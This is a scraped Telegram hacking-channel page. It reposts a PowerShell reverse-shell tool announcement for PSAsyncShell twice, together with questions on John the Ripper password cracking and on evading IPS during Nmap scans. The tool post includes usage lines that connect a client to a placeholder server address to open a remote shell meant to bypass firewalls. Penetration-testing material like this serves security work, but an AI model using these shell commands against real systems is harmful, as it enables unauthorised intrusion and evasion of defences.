Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Running more than one John the Ripper "sessions" concurrently?

Is it possible to run several John the Ripper "sessions" concurrently, i.e.:

Tab 1:

john --format=md5crypt

Tab 2:

john --format=sha256

Tab 3:

john --format=sha512

Is it advised to running it concurrently and are there any pros/cons of doing so vs running one at a time?

submitted by /u/D1CCP
[link] [comments]
hacking: security in practice
Best way to scan against IPS protected website?

Nmap is the most populair recon tool for scanning ports and services on websites. But I find it harder to use when a website well configured ips/ids system is implemented.

How do you tackle this when scanning against a website that 4000 ports open or is not getting any valuable information back?

submitted by /u/xcaliburr101
[link] [comments]
PSAsyncShell is an Asynchronous TCP Reverse (https://www.kitploit.com/search/label/Reverse) Shell written in pure PowerShell.Unlike other reverse shells, all the communication and execution flow is done asynchronously, allowing to bypass some firewalls (https://www.kitploit.com/search/label/Firewalls) and some countermeasures against this kind of remote (https://www.kitploit.com/search/label/Remote) connections.Additionally, this tool features command history, screen wiping, file uploading and downloading, information splitting through chunks and reverse Base64 URL encoded traffic.
RequirementsPowerShell 4.0 or greaterDownloadIt is recommended to clone the complete repository or download the zip file. You can do this by running the following command:git clone https://github.com/JoelGMSec/PSAsyncShell
Usage.\PSAsyncShell.ps1 -h

____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/

---------------------- by @JoelGMSec -----------------------

Info: This tool helps you to get a remote shell
over asynchronous TCP to bypass firewalls

Usage: .\PSAsyncShell.ps1 -s -p listen_port
Listen for a new connection from the client

.\PSAsyncShell.ps1 -c server_ip server_port
Connect the client (https://www.kitploit.com/search/label/Client) to a PSAsyncShell server

Warning: All info betwen parts will be sent unencrypted
Download & Upload functions don't use MultiPart

The detailed guide of use can be found at the following link:https://darkbyte.net/psasyncshell-bypasseando-firewalls-con-una-shell-tcp-asincronaLicenseThis project is licensed under the GNU 3.0 license - see the LICENSE file for more details.Credits and AcknowledgmentsThis tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSecContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can find me on Twitter (https://www.kitploit.com/search/label/Twitter) as @JoelGMSec (https://twitter.com/JoelGMSec) and on my blog darkbyte.net (https://darkbyte.net/).

Download PSAsyncShell (https://github.com/JoelGMSec/PSAsyncShell)

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
PSAsyncShell - PowerShell Asynchronous TCP Reverse Shell

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivaKwQorq948BbRsS9IbtUOeG6rO4fC0m40JWlK7VLPKcwgQQ1QE4Gbw2pPn12fW2_ppTEd2ryMorJsx-40Xs8EpAHQo5RU0Elh3JQsP6IKZ4nF8TSPjAEo4w4vbzdy4xS0LwOXVnjV234_3a9CcyCho797LYwjxeN89wH97x58LBupV3KFi-klAv6Kg/w640-h400/PSAsyncShell_1_PSAsyncShell.png
PSAsyncShell is an Asynchronous TCP Reverse Shell written in pure PowerShell.

Unlike other reverse shells, all the communication and execution flow is done asynchronously, allowing to bypass some firewalls and some countermeasures against this kind of remote connections.

Additionally, this tool features command history, screen wiping, file uploading and downloading, information splitting through chunks and reverse Base64 URL encoded traffic.
Requirements

* PowerShell 4.0 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/PSAsyncShell


Usage

.\PSAsyncShell.ps1 -h

____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/

---------------------- by @JoelGMSec -----------------------

Info: This tool helps you to get a remote shell
over asynchronous TCP to bypass firewalls

Usage: .\PSAsyncShell.ps1 -s -p listen_port
Listen for a new connection from the client

.\PSAsyncShell.ps1 -c server_ip server_port
Connect the client to a PSAsyncShell server

Warning: All info betwen parts will be sent unencrypted
Download & Upload functions don't use MultiPart



The detailed guide of use can be found at the following link:

https://darkbyte.net/psasyncshell-bypasseando-firewalls-con-una-shell-tcp-asincrona

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
Download PSAsyncShell

___________________________
@hacking_Attack
@Hacking_Video
eWPT to eWPTX Certified in 45 days (without INE labs) — Exam Review and Tips

In this article, I am going to provide feedback and helpful tips for the eWPT and eWPTXv2 exams.Continue reading on System Weakness »
Read more...
Tesla paid me $10,000 because of Directory Indexing

Many people are interested in trying Bug Bounties, but they feel they won’t be able to find anything. I hope that my success will serve as…Continue reading on Medium »
Read more...